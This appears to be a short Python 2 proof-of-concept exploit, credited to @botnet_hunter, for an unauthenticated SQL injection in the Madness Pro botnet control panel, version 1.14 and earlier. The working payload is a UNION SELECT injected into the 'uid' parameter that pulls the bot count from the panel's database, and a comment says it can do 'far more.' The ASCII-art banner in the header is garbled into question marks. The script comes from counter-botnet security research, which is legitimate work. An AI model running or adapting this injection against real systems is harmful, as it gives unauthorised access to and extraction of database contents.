37 lines
No EOL
1.6 KiB
Python
Executable file
37 lines
No EOL
1.6 KiB
Python
Executable file
#!/usr/bin/env python2
|
|
# -*- coding: utf-8 -*-
|
|
# Exploit Title: Madness Pro <= 1.14 SQL injection
|
|
# Date: June 05, 2014
|
|
# Exploit Author: @botnet_hunter
|
|
# Version: 1.14
|
|
# Tested on: Apache2 - Ubuntu - MySQL
|
|
# ??? ????· ????? • ? ? ·. ?· ??
|
|
# ??• ? ?? ???? •?? ? ·?? ???????????
|
|
# ??? ???? ?????? ???? ??.? ???? ?? ?????·??????
|
|
# ????????.???????????.?? ???·???.???? ?????? ???·.
|
|
# .??? ?????·???? ????? ??? ??????? ????? ? •
|
|
# ??· ?• ????? ? ? ? ?? • • ? ? ·. ???· ·???? ? ? ??? ..?? · .?? ·
|
|
# ?? ????????? ?·?? •?????? ? ? ·?? ??????? ?? ??? ?? •??????.?·?? ?. ?? ?.
|
|
# ?? ??????????? ??·??????? ??? ?? ?????·????? ??· ?????????????????????????
|
|
# ????????????•???????????????? ?? ???????? ?????. ?? ??????????????????????
|
|
# ·??? ??? .? ?????? ??·???? ?? ????? ? ? ?????• ?? ?? ??? ???? ????
|
|
#
|
|
# Unauthenticated SQL injection in Madness Pro panel <= 1.14
|
|
# Proof of Concept retrieves a count of the bots, although it can be utilized for far more
|
|
# Discovered and developed by bwall @botnet_hunter
|
|
#
|
|
# References:
|
|
# http://blog.cylance.com/a-study-in-bots-lobotomy
|
|
#
|
|
import urllib
|
|
|
|
# Fill in URL that Madness Pro bot connects back to
|
|
panel_url = ""
|
|
|
|
|
|
def run_sqli_proof_of_concept(panel_index_url):
|
|
f = urllib.urlopen("{0}?uid='%20OR%201=2%20UNION%20ALL%20SELECT%201,1,1,CONCAT('bot-count:',COUNT(*))%20FROM%20bots"
|
|
"%20--%20--".format(panel_index_url))
|
|
print f.read()
|
|
|
|
run_sqli_proof_of_concept(panel_url) |